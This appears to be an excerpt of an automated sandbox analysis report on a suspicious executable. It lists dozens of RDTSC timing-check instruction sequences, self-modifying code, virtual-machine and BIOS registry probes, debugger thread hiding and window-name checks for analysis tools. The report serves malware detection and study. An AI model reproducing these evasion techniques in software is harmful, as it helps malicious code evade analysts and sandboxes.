                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFFAD9 second address: EFFAEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 je 00007F5408C2110Eh 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFFAEB second address: EFFAFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F5408F96896h 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFF972 second address: EFF976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A7F5 second address: F0A806 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5408F96886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A806 second address: F0A815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5408C21106h 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A179 second address: F0A17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A17F second address: F0A187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A187 second address: F0A1AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5408F96886h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5408F9688Dh 0x00000013 jmp 00007F5408F9688Ch 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A333 second address: F0A36B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jne 00007F5408C21106h 0x0000000b popad 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 jo 00007F5408C21106h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 pop eax 0x00000021 pop edx 0x00000022 jmp 00007F5408C21116h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F115CD second address: F115DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 js 00007F5408F96886h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F115DA second address: F115F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jp 00007F5408C21106h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F115F0 second address: F115F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1B5FB second address: F1B608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jnp 00007F5408C21106h 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DB3D second address: F1DB43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2106F second address: F21077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21077 second address: F2107B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F29150 second address: F29154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F29154 second address: F29166 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5408F96886h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F29166 second address: F29185 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C21119h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F296C4 second address: F296DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F5408F96886h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pushad 0x00000010 jbe 00007F5408F96886h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F29968 second address: F2996F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2996F second address: F29975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F29ABF second address: F29AF1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5408C21112h 0x00000008 jng 00007F5408C21106h 0x0000000e ja 00007F5408C21106h 0x00000014 pushad 0x00000015 jmp 00007F5408C21119h 0x0000001a push edi 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F29AF1 second address: F29B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007F5408F96890h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5408F96899h 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F29B28 second address: F29B2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2A525 second address: F2A52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2A52B second address: F2A56C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F5408C2110Eh 0x00000012 pushad 0x00000013 jp 00007F5408C21106h 0x00000019 jmp 00007F5408C21117h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 pop eax 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E19D second address: F2E1A7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5408F9688Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2DD15 second address: F2DD19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2DD19 second address: F2DD37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5408F96886h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F5408F96888h 0x00000012 popad 0x00000013 push ecx 0x00000014 jbe 00007F5408F9688Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F364DF second address: F3650E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F5408C2110Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F5408C21111h 0x00000013 jl 00007F5408C21106h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3C282 second address: F3C2AC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5408F96886h 0x00000008 jc 00007F5408F96886h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F5408F96894h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3C2AC second address: F3C2B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F39A28 second address: F39A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F39A2C second address: F39A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F39A32 second address: F39A46 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5408F9688Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F39A46 second address: F39A77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push edi 0x0000000a jmp 00007F5408C2110Ah 0x0000000f pop edi 0x00000010 pushad 0x00000011 jmp 00007F5408C21119h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F49DC2 second address: F49DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F5408F9688Ah 0x0000000d jmp 00007F5408F9688Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F59C0F second address: F59C13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F58DCF second address: F58DD4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5908F second address: F590A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C2110Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F5408C21106h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F590A7 second address: F590D3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5408F9688Ah 0x0000000c jnp 00007F5408F96886h 0x00000012 jmp 00007F5408F9688Eh 0x00000017 jp 00007F5408F96886h 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F590D3 second address: F590D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F594FD second address: F59509 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnp 00007F5408F96886h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5969A second address: F596A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F596A0 second address: F596AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F596AA second address: F596AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F596AE second address: F596B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5B2A6 second address: F5B2D0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5408C21112h 0x00000008 push esi 0x00000009 js 00007F5408C21106h 0x0000000f ja 00007F5408C21106h 0x00000015 pop esi 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5B2D0 second address: F5B2F5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jp 00007F5408F96886h 0x0000000d jmp 00007F5408F96897h 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5CB03 second address: F5CB07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5CB07 second address: F5CB0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5CB0D second address: F5CB16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F3F4 second address: F5F3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F502 second address: F5F510 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F5408C21106h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F7D5 second address: F5F7DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F7DA second address: F5F7EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jo 00007F5408C2110Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F60DA9 second address: F60DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F60DAF second address: F60DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F629B9 second address: F629BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F629BD second address: F629C3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F629C3 second address: F629CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F5408F96886h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F629CD second address: F629D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F644F2 second address: F6450A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F5408F9688Eh 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C302A2 second address: 4C302A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C302A8 second address: 4C302AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C302AC second address: 4C302CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C2110Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5408C2110Ah 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C302CD second address: 4C302D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C302D1 second address: 4C302D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C302D7 second address: 4C30313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, al 0x00000005 pushfd 0x00000006 jmp 00007F5408F96899h 0x0000000b adc al, FFFFFFC6h 0x0000000e jmp 00007F5408F96891h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C30313 second address: 4C3037B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dh, 58h 0x00000006 popad 0x00000007 call 00007F5408C21114h 0x0000000c pushfd 0x0000000d jmp 00007F5408C21112h 0x00000012 adc esi, 468154C8h 0x00000018 jmp 00007F5408C2110Bh 0x0000001d popfd 0x0000001e pop eax 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F5408C2110Fh 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F5408C21110h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C3037B second address: 4C30381 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C30381 second address: 4C30387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E83819 second address: E83823 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5408F96886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CD17E2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CCF39E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: EA2855 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CD16EC instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A838B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00A838B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A84910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A84910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00A7DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00A7E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00A7ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A84570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00A84570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A83EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00A83EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A7F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A716D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00A7DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00A7BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A71160 GetSystemInfo,ExitProcess,0_2_00A71160
                Source: file.exe, file.exe, 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1297365011.00000000006B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8so%SystemRoot%\system32\mswsock.dll
                Source: file.exe, 00000000.00000002.1297365011.00000000006F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1297365011.000000000066E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13585
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13598
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13588
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13603
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13639
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
